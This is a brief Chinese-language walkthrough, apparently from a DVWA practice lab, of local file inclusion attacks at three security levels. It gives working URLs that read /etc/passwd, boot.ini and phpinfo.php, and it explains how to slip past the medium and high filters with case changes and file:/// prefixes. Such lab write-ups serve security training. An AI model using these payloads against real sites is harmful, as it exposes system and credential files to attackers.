低中高步骤截图
低:
未进行任何过滤
http://192.168.8.135/dvwa/vulnerabilities/fi/?page=/etc/passwd
查看目录
http://192.168.8.135/dvwa/vulnerabilities/fi/?page=c:\boot.ini
http://192.168.8.135/dvwa/vulnerabilities/fi/?page=C:\phpStudy\WWW\DVWA\phpinfo.php
中:
中等级过滤了http://以及https://可以大小写或者复写以及file:///绕过
http://192.168.8.135/dvwa/vulnerabilities/fi/?page=file://c:\phpStudy\WWW\dvwa\phpinfo.php
高:
高等级要求page参数必须以file开头,且不等于include.php,可以使用file:///绕过
http://192.168.8.135/dvwa/vulnerabilities/fi/?page=file:///C:\boot.ini